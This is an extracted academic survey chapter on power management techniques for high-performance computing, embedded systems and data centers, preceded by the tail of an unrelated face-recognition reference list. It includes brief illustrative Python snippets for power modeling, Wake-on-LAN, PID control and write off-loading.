8. Mehra, S., & Charaya, S. (2016) Enhancement of face recognition technology in biometrics.
International Journal of Scientific Research and Education 4(8)
9. Aydin, L., & Othman, N. A. (2017) A new IoT combined face detection of people by
using computervision for security Application. International Artificial Intelligence and data
Processing Symposium (IDAP).
10. Rahim, M. A., Hossain, M. N., Wahid, T., & Azam, M. S. (2013). Face recognition using
Local Binary Patterns (LBP). Global Journal of Computer Science and Technology Graphics
& Vision, 13(4), 3.
11. Tian, Y.-L., Kanade, T., & Cohn, J. F. (2001). Recognising action units for facial expression
analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 23(2), 95–115.
12. Tathe, S. V., Narote, A. S., Narote, S. P. (2016). Face detection and recognition in videos. In
2016 IEEE Annual India Conference (INDICON).
13. Tikoo, S., & Malik, N. (2016). Detection of face using Viola–Jones and recognition using
back propagation neural network. International Journal of Computer Science and Mobile
Computing, 5(5), 288–295.
14. Zhao, W., Chellappa, R., Rosenfeld, A., Phillips, P. J. (2003). Face recognition: A literature
survey (pp. 399–458). ACM Computing Surveys.
15. Jain, R., Gupta, D., Khanna, A. Usability feature optimization using MWOA. In S. Bhat-
tacharyya, A. Hassanien, D. Gupta, A. Khanna & I. Pan (Eds.), International Conference on
Innovative Computing and Communications (ICICC2018). Lecture Notes in Networks and
Systems, (Vol 56). Springer.
16. Hegel, F., Eyssel, F., & Wrede, B. (2010). The social robot flobi: Key concepts of industrial
design. IEEE International Symposium on Robot and Human Interactive Communication, 19,
107–112.
17. Kalas, M. S. (2014). Real time face detection and tracking using OpenCV. International Journal
of Soft Computing and Artificial Intelligence, 2(1), 41–44.
18. Thakare, N., Shrivastavaand, M., & Kumari, N. (2016). Face detection and recognition for auto-
matic attendance system. International Journal of Computer Science and Mobile Computing,
5(4), 74–78.
19. Manjunatha, R., & Nagaraja, R. (2017). Home security system and door access control based
on face recognition. International Research Journal of Engineering and Technology, 4(3),
437–442.
20. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., & Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd International
Conferences on Information Technology, Information Systems and Electrical Engineering
(ICITISEE). https://doi.org/10.1109/icitisee.2017.8285519.
State-of-the-Art Power Management
Techniques
Abstract Energy efficiency is one of the biggest challenges presently faced by high-performance computing (HPC) systems. The need to build energy-efficient computer systems and applications in the field of scientific computing is growing every day. Numerous studies have been carried out in the fields of embedded systems and mobile computing to minimize the power consumed by devices. The components and algorithms developed for achieving energy efficiency in such systems can also be applied in the field of HPC. In this paper, we survey power management techniques for HPC systems. We discuss different power management techniques along several important parameters to identify their merits and demerits. This paper is intended to help in developing a deeper understanding of different power management techniques and in designing more energy-efficient HPC systems of tomorrow.
1 Introduction
Power usage by virtual systems has exceeded all tolerable limits and has become a cause for major concern, since the majority of day-to-day affairs across the world are linked either directly or indirectly to virtual transactions through computer networks. As per reports, large-scale data centers in the USA consume around 70 billion kWh, which represents 2% of the country's energy consumption [1]. The inability to meet such huge consumption leads to the temporary delay or shutdown of several data center projects. High-density power consumption results
M. Ahmed (B)
HKBK College of Engineering, Bangalore, India
W. Ahmed
Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi
Arabia
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_18
The replacement of high-power components with low-power components to save power is referred to as static power management.
Rivoire et al. [6] suggested JouleSort, a benchmark to evaluate energy efficiency. The study revealed that JouleSort was approximately three times more energy efficient than existing techniques. However, JouleSort did not consider all the possible energy-related concerns of multimedia applications, since it focused on data management tasks.
Caulfield et al. [7] described a new system architecture known as Gordon for reducing power consumption and increasing the performance of data-intensive applications. They combined flash memory with power-efficient processors to reduce power consumption and studied the impact of flash storage and the Gordon architecture on the power efficiency and performance of data-centric applications. The findings revealed that Gordon systems performed 1.5 times better than disk-based clusters and delivered up to 2.5 times more performance per watt.
Andersen et al. [8] made an attempt to modify the conventional architecture of
data-intensive clusters to minimize the power consumption without any compromise
in their capacity, latency, availability, and throughput. They presented an architecture
known as fast array of wimpy nodes (FAWN), where the energy-efficient CPUs are
combined with flash storage to provide faster and more efficient random access to
data. The analysis revealed that FAWN clusters are capable of handling 350 key-value queries per joule of energy, two orders of magnitude more than a disk-based system.
Hamilton [9] identified that the cost of delivering high-scale services mainly depends on the hardware and power required for the services. The study investigated power dissipation in high-scale data centers. It was found that low-power servers yielded the same aggregate throughput effectively at lower cost compared to high-power servers.
Vasudevan et al. [10] experimentally evaluated FAWN, which consists of a large number of slower but efficient nodes coupled with low-power storage. The study used a set of microbenchmarks to check the maximum performance of the wimpy nodes. The findings revealed that the overall performance per unit of energy of the low-frequency nodes exceeded that of conventional high-performance CPUs.
However, there are some limitations in this architecture, as pointed out by Valentini et al. [11]. According to them, the major concern is the feasibility of the FAWN architecture for problems that cannot be parallelized or whose working set cannot be further divided and assigned to the available memory of the smaller nodes.
According to Liu and Hsu [2], dynamic speed scaling (DSS) and dynamic resource sleeping (DRS) are the two variants of dynamic power management (DPM). In DSS, the power consumption of the processor is controlled by modulating its speed; thus, performance is traded off depending on necessity. Dynamic voltage scaling (DVS) operates by changing the voltage, i.e., either increasing or decreasing it according to circumstances: if we require more performance, we increase the voltage (overvolting), and if we want to save power, we decrease the voltage (undervolting). Similarly, dynamic frequency scaling (DFS) operates by scaling frequencies, and dynamic voltage and frequency scaling (DVFS) operates by curtailing the frequency and/or the supply voltage to the processor. Thermal throttling depends upon the temperature of the processor. Multifrequency memories and multispeed disks, on the other hand, diminish the working frequency of the memory and disks, respectively. Increased energy consumption due to transitions between performance states is one of the limitations of these mechanisms; moreover, it is responsible for increased resource latency overhead. DRS deactivates (powers off) components of the computer to conserve energy and activates them when required. The power-on and power-off states are described as C0 and Cn, respectively. This mechanism is restricted by the amount of time and energy spent on the transition from the inactive state to the active state.
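The DVS/DFS trade-off above follows from the standard CMOS dynamic power model, P ≈ C·V²·f: power scales linearly with frequency but quadratically with voltage. A small illustrative sketch (the effective capacitance and operating points are invented values, not figures from this survey):

```python
def dynamic_power(c_eff, voltage, freq_hz):
    """Approximate dynamic CMOS power: P = C_eff * V^2 * f."""
    return c_eff * voltage ** 2 * freq_hz

# Hypothetical operating points for illustration only.
baseline = dynamic_power(1e-9, 1.2, 2.0e9)     # nominal: 1.2 V at 2.0 GHz
undervolted = dynamic_power(1e-9, 1.0, 1.4e9)  # DVFS: 1.0 V at 1.4 GHz

savings = 1 - undervolted / baseline
print(f"power saved by scaling down: {savings:.1%}")  # → 51.4%
```

The quadratic voltage term is why combined voltage-and-frequency scaling (DVFS) saves far more than frequency scaling alone.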
Ge et al. [12] recommended performance-based distributed DVS techniques for power-aware HPC clusters. The study performed a comparative analysis of the available DVS techniques on a power-aware cluster while executing parallel scientific applications and found that DVS scheduling techniques achieved up to 36% total energy savings with no loss in performance. However, the energy savings varied depending on the application, the system workload, and the DVS strategy. Another drawback identified in this study was that these techniques were implemented largely by manual means and should be replaced by modern automated ones.
Hotta et al. [13] introduced a power-performance optimization technique based on power profiles generated in a high-performance PC cluster using DVFS scheduling. The execution of the program was split into several sections, and the best gear for power efficiency was selected for each. Selecting the best gear was not an easy and direct task, as DVFS transitions are not free of overhead; an optimization algorithm was therefore proposed to select a gear while also considering the transition overhead. A power-profiling system known as PowerWatch was designed to examine the efficiency of the optimization algorithm. The findings revealed that the study achieved almost a 40% reduction in terms of energy-delay product (EDP) without any major impact on performance.
Rajamani et al. [14] designed a novel approach to power management in which critical workload indicators and the power and performance usage of applications were continuously monitored. They proposed two solutions: a performance maximizer, which identifies the best performance under specific power constraints, and a powersaver, which minimizes power consumption while maintaining optimum performance levels.
The study by Freeh et al. [15] presented a system known as Jitter, which reduces the frequency of processors in a cluster to minimize power consumption. Jitter reduces the energy spent by nodes at synchronization points during slack times, thereby achieving a significant reduction in energy consumed. The findings showed that Jitter saved 8% of the energy consumed, with a 2% time penalty, on an unbalanced program.
According to Khargharia et al. [16], power management techniques can be classified into the following types: hardware-based power management, turning off idle devices, and quality of service (QoS) and energy trade-offs. Hardware-based power management involves varying the voltage and frequency of the processor according to the performance requirements. Turning off idle devices is yet another DPM technique, in which devices are turned on/off wholly to reduce power consumption; this technique can be used in both battery-operated devices and servers. The QoS and energy trade-offs technique involves saving more power at the cost of performance efficiency within acceptable limits. They presented a theoretical framework (Automatic Memory Management) for optimizing power and performance in data centers automatically at runtime with the help of a multichip memory system.
Laszewski et al. [17] used DVFS to minimize power consumption in virtual machines. The study proposed and implemented a scheduling algorithm that allocates virtual machines in a DVFS-enabled cluster by dynamically scaling the supply voltages. The algorithm was analyzed through simulation, and the performance analysis revealed that the design and implementation of such scheduling algorithms achieve a significant reduction in power consumption.
Huang and Feng [18] used a specific workload characterization that infers CPU stall cycles due to off-chip activities. The study presented a power-aware, eco-friendly, run-time algorithm based on this workload characterization. To obtain the workload characterization and to scale the voltage and frequency supplied to the processor in a parallel computing environment, the algorithm dynamically monitored the processor state. The algorithm achieved better performance control than the β-adaptation algorithm and the Linux ondemand governor, achieving 11% savings in the overall energy consumed.
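The intuition of such stall-based scaling can be sketched in a few lines: when most cycles stall on off-chip accesses, a lower clock barely lengthens runtime but saves power. This is an illustrative heuristic only, not Huang and Feng's actual algorithm, and the frequency steps are invented:

```python
def pick_frequency(stall_fraction, freqs_mhz):
    """Choose the lowest available frequency that still covers the
    compute-bound share of cycles; memory-bound phases get slower clocks."""
    target = max(freqs_mhz) * (1.0 - stall_fraction)
    return min(f for f in freqs_mhz if f >= target)

steps = [800, 1400, 2000]          # invented DVFS gears, in MHz
print(pick_frequency(0.5, steps))  # → 1400 (memory-bound phase)
print(pick_frequency(0.0, steps))  # → 2000 (compute-bound phase)
```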
Le Sueur and Heiser [19] analyzed the efficiency of DVFS on three successive generations of AMD Opteron processors using memory-bound benchmarks. The study showed that the effectiveness of DVFS is low on newer platforms, and actual savings were observed only when execution times were shorter (at higher frequencies) and were “padded” with the energy consumed when idle.
Alvarruiz et al. [20] proposed a system called CLUES, which replaces the idle state with a powered-off state. The system was integrated with different HPC cluster middleware such as batch-queuing systems and cloud management systems. Powering the computing nodes on and off was performed through different mechanisms such as power device units, Wake-on-LAN, the Intelligent Platform Management Interface, or other infrastructure-specific mechanisms. The performance of the model was evaluated against two real use cases involving two different HPC clusters. The findings revealed energy and cost savings of about 38% and 16%, respectively. However, one limitation of the study was that it considered only nodes with homogeneous energy consumption.
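Waking a powered-off node via Wake-on-LAN, one of the mechanisms mentioned above, amounts to broadcasting a "magic packet": six 0xFF bytes followed by the target MAC address repeated sixteen times. A minimal stdlib sketch (the MAC address is a placeholder):

```python
import socket

def make_magic_packet(mac: str) -> bytes:
    """Build a Wake-on-LAN magic packet: 6 x 0xFF, then the MAC 16 times."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(mac_bytes) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return b"\xff" * 6 + mac_bytes * 16

def wake(mac: str, broadcast: str = "255.255.255.255", port: int = 9) -> None:
    """Send the magic packet via UDP broadcast (port 9 is customary)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.sendto(make_magic_packet(mac), (broadcast, port))

packet = make_magic_packet("00:11:22:33:44:55")  # placeholder MAC
print(len(packet))  # → 102
```

In a CLUES-like setup, the middleware would call `wake()` when the job queue demands more nodes than are currently powered on.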
An optimization strategy that uses both voltage scaling and chip parallelism was proposed by Ozturk et al. [21] for voltage-island-based embedded designs. The approach makes use of a compiler that exploits heterogeneity in parallel execution, applying different voltages and frequencies to different processors to reduce energy consumption without increasing the overall execution cycles. Experiments were carried out with different applications, and the results revealed that the optimization technique is capable of yielding energy benefits at a large scale.
Embedded systems have size and cost constraints. The battery is very small and the surface area of an embedded system is limited, which restricts heat dissipation; therefore, embedded systems require proper cooling. In some embedded applications, such as video and audio playback and gaming, the ratio of the processor's runtime to idle time is very high. In such devices, dynamic power management techniques can help reduce power consumption at runtime.
Pedram [22] reviewed the tools and techniques adopted for power management in embedded systems, considering the hardware platform, the application software, and the system software. The concepts and techniques were illustrated with design examples from an Intel StrongARM-based system. The study was not intended to be a comprehensive review, yet it serves as a base for a comprehensive understanding of power-aware design methodologies and techniques for embedded systems.
Brock and Rajamani [23] designed a generic power management system to manage energy and power efficiently in embedded systems. According to the design, the power management strategy can be varied based on the application. A DPM strategy refers to the policies for power optimization designed by the system designer; however, the activation of these policies is controlled by the policy manager.
Agarwal et al. [24] used an on-demand paging scheme to increase the energy efficiency of wireless embedded systems. The study implemented the scheme on an infrastructure-based WLAN consisting of iPAQ PDAs equipped with Bluetooth radios and Cisco Aironet wireless networking cards. The findings exhibited power savings ranging from 23% to 48% over 802.11b standard operating modes, with trivial impact on performance. One major drawback of the design is that it was prototyped on low-power Bluetooth radios, and the performance of the scheme on high-power, large sensor-based networks remains uncertain.
Raghunathan and Chou [25] studied the various issues and trade-offs involved in designing and implementing energy-saving techniques in embedded systems. They explained system design techniques that involve extracting energy from the environment and making it available for consumption by the system. The study described various power management techniques that consider the different spatiotemporal characteristics of energy availability and energy usage within a system and across a network. As a concluding remark, the study suggested that the entire system, from the design of the architecture to power management, must be optimized holistically at the application and networking levels for harvesting systems to operate effectively.
Choi [26] used DC-DC converters as a means of minimizing energy in embedded systems. The study analyzed the impact of variation in the efficiency of DC-DC converters while executing a single task and also while implementing a DVS scheme. The study put forward the DC-DVS technique, which accounts for the DC-DC converter in order to minimize energy consumption; the characteristics of DC-DC converters were embedded into the DVS technique to perform multiple tasks. Finally, the study proposed a technique named DC-CONF for configuring a DC-DC converter and presented an integrated framework to address DC-DC converter configuration and DVS simultaneously. The experimental results indicated that the proposed approach saved up to 24.8% of energy compared with existing power management schemes that do not take the efficiency variation of DC-DC converters into account.
Park et al. [27] presented a compiler-based method for reducing leakage power during code execution by inserting power-gating instructions into the code to activate/deactivate (i.e., turn ON/OFF) the functional units in a microprocessor. The study proposed a polynomial-time optimal algorithm called PG-instr to minimize total leakage power while considering the power and delay overhead of power gating. The study also found that the algorithms were adaptable to other power-gated resources, such as diverse memory units and multicores.
Wang and Chen [33] developed a new multi-input-multi-output (MIMO) control algorithm for multiple servers working in harmony. Within every control cycle, the controller collects the power consumption and CPU utilization of each server, then calculates a new CPU frequency for each processor and directs each processor to alter its frequency in a coordinated way.
Liu and Zhu [2] detailed the thermal management technique used in commercial clusters, which involves throttling, i.e., reducing the amount of dissipated heat. This reduction is important, as high temperatures make systems unreliable and costly.
Skadron et al. [34] developed a proportional–integral–derivative (PID) controller to regulate the heat produced. It combines three actions: (1) proportional action, where power is regulated in proportion to the current error; (2) integral action, where power is adjusted according to the time integral of past errors so as to maintain a zero steady-state error; and (3) derivative action, where overshoot is circumvented by damping the response, providing stability to the controller.
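The three actions map directly onto a textbook PID update, sketched below; this is a generic controller, not Skadron et al.'s formal-control implementation, and the gains and setpoint are invented:

```python
class PIDController:
    """u = Kp*e + Ki*integral(e dt) + Kd*de/dt, with e = setpoint - measurement."""

    def __init__(self, kp, ki, kd, setpoint):
        self.kp, self.ki, self.kd = kp, ki, kd
        self.setpoint = setpoint
        self.integral = 0.0     # accumulated error (integral action)
        self.prev_error = 0.0   # last error (for derivative action)

    def update(self, measurement, dt):
        error = self.setpoint - measurement
        self.integral += error * dt                  # integral action
        derivative = (error - self.prev_error) / dt  # derivative action
        self.prev_error = error
        return self.kp * error + self.ki * self.integral + self.kd * derivative

# Invented gains: drive chip temperature toward a 70 °C setpoint.
pid = PIDController(kp=2.0, ki=0.1, kd=0.5, setpoint=70.0)
print(pid.update(75.0, dt=1.0))  # → -13.0 (negative output: throttle power down)
```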
Taffoni et al. [35] evaluated the energy consumption of computation for two applications from the astrophysical domain. The evaluation was done on three different systems: an Intel-based cluster, a prototype of an exascale supercomputer, and a microcluster based on ARM MPSoCs, which had the lowest energy consumption, but at the cost of slower performance.
Data centers host a wide range of Internet facilities such as Web hosting, e-commerce services, banking, retail commerce, and cloud computing. This wide range of functions requires very high power, which in turn requires advanced cooling configurations. Hence, energy consumption in large-scale data centers imposes high electricity costs, which makes power and energy consumption the two main concerns in data centers. Expensive uninterruptible power supplies and backup power generators are needed for peak power requirements [36]. Power management techniques adopted for battery-held devices cannot be used in the context of servers, because server workloads and operating environments differ from those of battery-operated devices.
Chen et al. [37] proposed the first dedicated framework to reduce the energy
consumption in servers at hosting centers that run multiple applications to meet
performance-based service-level agreements (SLAs). The study used steady-state
queuing analysis, feedback control theory, and a hybrid mechanism that is based
on both steady-state queuing and feedback control theory. When implemented with real Web server traces, the solutions provided by the framework proved more adaptive to the workload behavior while performing server provisioning and speed control.
The power consumption behavior of large-scale servers executing different classes of applications was studied by Fan et al. [30]. The study found that there exists a distinct gap (about 40%) between the observed and theoretical power usage values in data centers, even while executing well-tuned applications. The study used a modeling framework to estimate the power-saving efficiency of power management schemes. The findings revealed that power and energy savings were greater at the cluster level (thousands of servers) than at the rack level (tens of servers). The study pointed out the necessity for systems to remain power efficient not only across the activity range, but also during peak performance.
Raghavendra et al. [38] presented a coordinated multilevel power management scheme for data centers that combines different individual power management approaches. The simulation results, based on 180 server traces from nine different real-world enterprises, demonstrated the correctness, stability, and efficiency advantages of the proposed solution. Furthermore, with its unified model, the study performed a detailed quantitative sensitivity analysis of the impact of different architectures, implementation styles, workload sizes, and system design choices on power management.
Narayanan et al. [39] proposed a technique called “write off-loading” to conserve energy in enterprise storage. Write requests to spun-down disks are temporarily redirected to persistent storage elsewhere in the enterprise data center. This alters the I/O access pattern and generates significant idle periods during which a volume's disks can be spun down, saving energy. The study analyzed the potential savings using real-world traces collected from thirteen servers in a data center. The findings showed that significant energy savings were achieved by spinning down idle disks; moreover, since write off-loading creates longer idle periods, it helps save large amounts of energy. The study validated the analysis by implementing write off-loading on a hardware testbed and measuring its performance. The evaluation confirmed the analysis, showing a 28–36% reduction in energy consumption from just spinning down idle disks and a 45–60% reduction when using write off-loading.
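The redirect-and-reclaim cycle behind write off-loading can be sketched as a toy model; this is an illustration of the idea only, not the paper's block-level implementation, and all names are invented:

```python
class WriteOffloader:
    """Toy model of write off-loading: while the home disk is spun down,
    writes go to a log elsewhere; on spin-up they are reclaimed."""

    def __init__(self):
        self.home = {}         # blocks on the home volume
        self.offload_log = []  # (block, data) pairs redirected elsewhere
        self.spun_down = False

    def write(self, block, data):
        if self.spun_down:
            self.offload_log.append((block, data))  # redirect, keep disk asleep
        else:
            self.home[block] = data

    def spin_up(self):
        self.spun_down = False
        for block, data in self.offload_log:  # reclaim in write order
            self.home[block] = data
        self.offload_log.clear()

vol = WriteOffloader()
vol.write("b1", "old")
vol.spun_down = True
vol.write("b1", "new")  # off-loaded; the home disk stays spun down
vol.spin_up()
print(vol.home["b1"])   # → new
```

The energy win comes from the `spun_down` branch: every redirected write is an I/O that would otherwise have forced the home disk to spin up.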
Govindan et al. [40] designed a technique based on controlled provisioning, statistical multiplexing, and overbooking for provisioning the power infrastructure in data centers. The evaluation of a prototype data center proved the feasibility and benefits of the technique. The results show that, by accurately identifying the peak power needs of hosted workloads, the technique achieved double the CPW offered by the power distribution unit (PDU) when executing TPC-W, an e-commerce benchmark. A 10% overbooking of the PDU based on the derived power profiles yielded a 20% additional improvement in PDU throughput with minimal loss in performance.
Leverich et al. [41] used per-core power gating (PCPG) as an additional power management mechanism for multicore processors. The study was conducted on a commercial 4-core chip using real-world application traces from enterprise environments. PCPG was found to reduce the energy consumed by the processor by 40% without any significant performance overheads. Furthermore, compared with DVFS, PCPG was more effective, saving 30% more energy. The study suggested implementing DVFS and PCPG together, which can save up to 60% of the power consumed.
Liu et al. [42] addressed the challenges faced by elastic power management in
Internet data centers. They analyzed the resource provisioning and utilization patterns
232 M. Ahmed and W. Ahmed
in data centers and proposed a macro-resource management layer that can coordinate
the various cyber and physical resources. They also reviewed some of the existing
solutions for resource management along with their limitations. The study pointed out
the importance of a coordination layer that aids resource utilization by carefully
monitoring the cyber activities and physical dynamics in data centers, and described
this as a challenging goal requiring breakthroughs in many areas of research
such as data management, resource and software abstraction, sensing, modeling,
control, and system design. According to the study, the service requests that hit
a data center must be coordinated with its physical resources to achieve both
operational and energy efficiency.
Urgaonkar et al. [43] explored power management and optimal resource allocation
in virtualized data centers hosting heterogeneous applications with time-varying
workloads. The study used the system's queueing information to make online
control decisions. Specifically, it used a technique known as Lyapunov optimization
to design an online admission control, routing, and resource allocation algorithm
for a virtualized data center. The findings revealed that the algorithm maximizes
a joint utility of the average application throughput while managing the power and
energy costs of the data center.
Beloglazov and Buyya [44] proposed a resource management policy for dealing
with power-performance trade-offs in cloud data centers. The findings showed that
dynamically reallocating virtual machines and switching off idle nodes saves a
substantial amount of energy while still delivering the promised QoS.
Lin et al. [45] examined the amount of power saved by dynamically “right-sizing”
the data center: servers were turned off during idle periods, and an online algorithm
was used to quantify the achievable power savings. The study exploited the simple
structure of an optimal offline algorithm for dynamic right-sizing to design a new
“lazy” online algorithm that is 3-competitive. The algorithm was validated using
traces from two real data center workloads; the results showed that significant
savings are achievable when the peak-to-mean ratio (PMR) of the data center is
greater than 3, the cost of toggling a server is at most a few hours of server costs,
and the background load is below 40%.
7 Conclusion
In this paper, we have reviewed various studies related to power management tech-
niques in embedded systems, HPC systems, HPC clusters, data centers, and virtual
environments.
The studies related to static power management bring out some major shortcomings,
including a lapse in the energy concerns of multimedia applications, since the study
focused mainly on data management tasks [6]. Valentini et al. [11] pointed out the
limitations of the popular FAWN architecture and also highlighted concerns
regarding its feasibility. They pointed
State-of-the-Art Power Management Techniques 233
out that the FAWN architecture is unsuitable when the workload can neither be
parallelized nor have its working set divided to fit into the available memory of the
smaller nodes.
Some of the major limitations that emerged from the in-depth review of power
management in embedded systems include the compatibility of the design models
with high-power devices [24] and the need to optimize the entire system, from design
architecture to power management, for the proper operation of these systems [25].
Studies on power management techniques for HPC systems showed a series of
constraints and shortcomings, including long request time delays [46], energy-
saving/time-delay trade-offs [47], cooling cost and temperature thresholds [48],
utilization thresholds [49], failure rates, temperature constraints, power budgets
[50], and performance [33, 51, 52].
The review of studies pertaining to dynamic power management revealed limitations
such as models applicable only to homogeneous systems [20]. The energy savings
were found to depend on the application, workload, system, and DVS strategy.
Furthermore, most of the techniques were applied manually and should be replaced
by modern automated ones [12].
The studies describing the power management techniques adopted in various
functional areas revealed major snags that need to be addressed and rectified.
Reviews of power management in data centers brought out a serious limitation
regarding the practical applicability of the proposed frameworks, as many of them
are purely theoretical works that have not been successfully implemented on any
platform [37, 44].
The gaps mentioned above pave the way for designing an optimized power manage-
ment technique for HPC.
References
1. Shehabi, A., Smith, S., Sartor, D., Brown, R., Herrlin, M., Koomey, J., Masanet, E., Horner,
N., Azevedo, I., & Lintner, W. (2016). United States data center energy usage report.
2. Liu, Y., & Zhu, H. (2010). A survey of the research on power management techniques for
high-performance systems. Software: Practice and Experience, 40(11), 943–964.
3. Feng, W.-C. (2003). Making a case for efficient supercomputing. Queue, 1(7), 54.
4. Ge, R., Feng, X., Song, S., Chang, H.-C., Li, D., & Cameron, K. W. (2010). Powerpack: Energy
profiling and analysis of high-performance systems and applications. IEEE Transactions on
Parallel and Distributed Systems, 21(5), 658–671.
5. Pinheiro, E., Bianchini, R., & Dubnicki, C. (2006). Exploiting redundancy to conserve energy
in storage systems. ACM SIGMETRICS Performance Evaluation Review, 34(1), 15–26.
6. Rivoire, S., Shah, M. A., Ranganathan, P., & Kozyrakis, C. (2007). Joulesort: A balanced energy-
efficiency benchmark. In Proceedings of the 2007 ACM SIGMOD International Conference
on Management of Data. ACM (pp. 365–376).
7. Caulfield, A. M., Grupp, L. M., & Swanson, S. (2009). Gordon: using flash memory to build fast,
power-efficient clusters for data-intensive applications. ACM Sigplan Notices, 44(3), 217–228.
8. Andersen, D. G., Franklin, J., Kaminsky, M., Phanishayee, A., Tan, L., & Vasudevan, V. (2009).
Fawn: A fast array of wimpy nodes. In: Proceedings of the ACM SIGOPS 22nd symposium on
Operating Systems Principles. ACM (pp. 1–14).
9. Hamilton, J. (2009). Cooperative expendable micro-slice servers (cems): low cost, low power
servers for internet-scale services. In Conference on Innovative Data Systems Research
(CIDR’09)(January 2009).
10. Vasudevan, V., Andersen, D., Kaminsky, M., Tan, L., Franklin, J., & Moraru, I. (2010). Energy-
efficient cluster computing with fawn: Workloads and implications. In Proceedings of the 1st
International Conference on Energy-Efficient Computing and Networking. ACM (pp. 195–
204).
11. Valentini, G. L., Lassonde, W., Khan, S. U., Min-Allah, N., Madani, S. A., Li, J., et al. (2013).
An overview of energy efficiency techniques in cluster computing systems. Cluster Computing,
1–13.
12. Ge, R., Feng, X., & Cameron, K. W. (2005). Improvement of power-performance efficiency
for high-end computing. In 19th IEEE International Proceedings on Parallel and Distributed
Processing Symposium, 2005. IEEE (pp. 8–pp).
13. Hotta, Y., Sato, M., Kimura, H., Matsuoka, S., Boku, T., & Takahashi, D. (2006). Profile-
based optimization of power performance by using dynamic voltage scaling on a pc cluster. In
Parallel and Distributed Processing Symposium, 2006. IPDPS 2006. 20th International. IEEE
(pp. 8–pp).
14. Rajamani, K., Hanson, H., Rubio, J., Ghiasi, S., & Rawson, F. (2006). Application-aware
power management. In 2006 IEEE International Symposium on Workload Characterization.
IEEE (pp. 39–48).
15. Freeh, V. W., Kappiah, N., Lowenthal, D. K., & Bletsch, T. K. (2008). Just-in-time dynamic
voltage scaling: Exploiting inter-node slack to save energy in mpi programs. Journal of Parallel
and Distributed Computing, 68(9), 1175–1185.
16. Khargharia, B., Hariri, S., & Yousif, M. S. (2008). Autonomic power and performance man-
agement for computing systems. Cluster computing, 11(2), 167–181.
17. Von Laszewski, G., Wang, L., Younge, A. J., & He, X. (2009) Power-aware scheduling of virtual
machines in dvfs-enabled clusters. In IEEE International Conference on Cluster Computing
and Workshops, 2009. CLUSTER’09. IEEE (pp. 1–10).
18. Huang, S., & Feng, W. (2009) Energy-efficient cluster computing via accurate workload char-
acterization. In Proceedings of the 2009 9th IEEE/ACM International Symposium on Cluster
Computing and the Grid. IEEE Computer Society (pp. 68–75).
19. Le Sueur, E., & Heiser, G. (2010) Dynamic voltage and frequency scaling: The laws of dimin-
ishing returns.
20. Alvarruiz, F., de Alfonso, C., Caballer, M., & Hernández, V. (2012). An energy manager for
high performance computer clusters. In 2012 IEEE 10th International Symposium on Parallel
and Distributed Processing with Applications (ISPA). IEEE (pp. 231–238).
21. Ozturk, O., Kandemir, M., & Chen, G. (2013). Compiler-directed energy reduction using
dynamic voltage scaling and voltage islands for embedded systems. IEEE Transactions on
Computers, 62(2), 268–278.
22. Pedram, M. (2001). Power optimization and management in embedded systems. In Proceedings
of the 2001 Asia and South Pacific Design Automation Conference. ACM (pp. 239–244).
23. Brock, B., & Rajamani, K. (2003). Dynamic power management for embedded systems [soc
design]. In SOC Conference, 2003. Proceedings. IEEE International [Systems-on-Chip]. IEEE
(pp. 416–419).
24. Agarwal, Y., Schurgers, C., & Gupta, R. (2005). Dynamic power management using on demand
paging for networked embedded systems. In Proceedings of the 2005 Asia and South Pacific
Design Automation Conference. ACM (pp. 755–759).
25. Raghunathan, V., & Chou, P. H. (2006). Design and power management of energy harvest-
ing embedded systems. In Proceedings of the 2006 international symposium on Low power
electronics and design. ACM (pp. 369–374).
26. Choi, Y., Chang, N., & Kim, T. (2007). Dc-dc converter-aware power management for low-
power embedded systems. IEEE Transactions on Computer-Aided Design of Integrated Circuits
and Systems, 26(8), 1367–1381.
27. Park, D., Lee, J., Kim, N. S., & Kim, T. (2010). Optimal algorithm for profile-based power
gating: A compiler technique for reducing leakage on execution units in microprocessors.
In Proceedings of the International Conference on Computer-Aided Design. IEEE Press (pp.
361–364).
28. Pinheiro, E., Bianchini, R., Carrera, E. V., & Heath, T. (2001). Load balancing and unbalancing
for power and performance in cluster-based systems. In Workshop on compilers and operating
systems for low power, Vol. 180. Barcelona, Spain (pp. 182–195).
29. Chase, J. S., Anderson, D. C., Thakar, P. N., Vahdat, A. M., & Doyle, R. P. (2001). Managing
energy and server resources in hosting centers. ACM SIGOPS operating systems review, 35(5),
103–116.
30. Fan, X., Weber, W.-D., & Barroso, L. A. (2007). Power provisioning for a warehouse-sized
computer. ACM SIGARCH Computer Architecture News, 35(2), 13–23.
31. Ranganathan, P., Leech, P., Irwin, D., & Chase, J. (2006). Ensemble-level power management
for dense blade servers. ACM SIGARCH Computer Architecture News, 34(2), 66–77.
32. Femal, M. E., & Freeh, V. W. (2005). Boosting data center performance through non-uniform
power allocation. In Proceedings of 2nd International Conference on Autonomic Computing,
2005. ICAC 2005. IEEE (pp. 250–261).
33. Wang, X., & Chen, M. (2008). Cluster-level feedback power control for performance optimiza-
tion. In IEEE 14th International Symposium on High Performance Computer Architecture,
2008. HPCA 2008. IEEE (pp. 101–110).
34. Skadron, K., Abdelzaher, T., & Stan, M. R. (2002). Control-theoretic techniques and thermal-
rc modeling for accurate and localized dynamic thermal management. In High-Performance
Computer Architecture, 2002. Proceedings. Eighth International Symposium on. IEEE (pp.
17–28).
35. Taffoni, G., Tornatore, L., Goz, D., Ragagnin, A., Bertocco, S., Coretti, I., Marazakis, M.,
Chaix, F., Plumidis, M., Katevenis, M., Panchieri, R., & Perna, G. (2019). Towards exascale:
Measuring the energy footprint of astrophysics hpc simulations. In 2019 15th International
Conference on eScience (eScience) (pp. 403–412).
36. Bianchini, R., & Rajamony, R. (2004). Power and energy management for server systems.
Computer, 37(11), 68–76.
37. Chen, Y., Das, A., Qin, W., Sivasubramaniam, A., Wang, Q., & Gautam, N. (2005). Manag-
